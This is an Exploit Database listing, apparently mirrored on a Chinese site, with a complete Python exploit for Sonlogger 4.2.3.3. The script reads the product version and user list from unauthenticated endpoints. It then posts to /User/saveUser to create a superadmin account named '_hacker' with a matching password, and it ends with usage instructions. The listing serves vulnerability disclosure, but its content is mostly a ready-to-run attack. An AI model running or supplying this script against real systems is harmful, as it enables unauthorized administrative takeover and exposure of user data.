Sonlogger 4.2.3.3 – SuperAdmin Account Creation / Information Disclosure

• Exploit Database
• 13 阅读

• 作者： Berkan Er
  日期： 2021-03-15
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49650/

• # Exploit Title: Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure
  # Date: 04-02-2021
  # Exploit Author: Berkan Er
  # Vendor Homepage: https://www.sonlogger.com/
  # Version: 4.2.3.3
  # Tested on: Windows 10 Enterprise x64 Version 1803
  # A remote attacker can be create an user with SuperAdmin profile
  
  #!/usr/bin/python3
  
  import argparse
  import string
  import sys
  from random import random
  
  import requests
  import json
  
  banner = '''
  Sonlogger Log and Report System - v4.2.3.3
  Remote SuperAdmin Account Creation Vulnerability / Information Disclosure
  
  Berkan Er <b3rsec@protonmail.com>
  @erberkan
  '''
  
  commonHeaders = {
  'Content-type': 'application/json',
  'Accept': 'application/json, text/javascript, */*; q=0.01',
  'X-Requested-With': 'XMLHttpRequest'
  }
  
  
  def get_random_string():
  res = ''.join(random.choices(string.ascii_lowercase, k=8))
  print(res)
  return str(res)
  
  
  def getProductInfo(host, port, flag):
  response = requests.post('http://' + host + ':' + port + '/shared/GetProductInfo',
   data={},
   headers=commonHeaders)
  
  print("[*] Status code: ", response.status_code)
  print("[*] Product Version: ", response.json()['Version'])
  info_json = json.dumps(response.json(), indent=2)
  
  response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
  user_json = json.dumps(response_1.json(), indent=2)
  
  if flag:
  print("\n*** Product Infos=\n" + info_json)
  print("\n*** Users=\n" + user_json)
  
  if response.json()['Version'] == '4.2.3.3':
  print("[+] It seems vulnerable !")
  return True
  else:
  print("[!] It doesn't vulnerable !")
  return False
  
  
  def createSuperAdmin(host, port):
  payload = '''{
  '_profilename':'superadmin_profile', 
  '_username':'_hacker', 
  '_password':'_hacker', 
  '_fullname':'', '_email':''
  }'''
  
  response = requests.post('http://' + host + ':' + port + '/User/saveUser', data=payload, headers=commonHeaders)
  print("[*] STAUTS CODE:", response.status_code)
  print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker")
  
  response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
  json_formatted_str = json.dumps(response_1.json(), indent=2)
  print("\n*** Users=\n" + json_formatted_str)
  
  
  def main():
  print(banner)
  
  try:
  host = sys.argv[1]
  port = sys.argv[2]
  action = sys.argv[3]
  
  if action == 'TRUE':
  if getProductInfo(host, port, False):
  createSuperAdmin(host, port)
  else:
  getProductInfo(host, port, True)
  
  print("KTHNXBYE!")
  
  except:
  print("Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP "
  "Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product "
  "Infos")
  print("\nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUE\n")
  
  
  if __name__ == "__main__":
  main()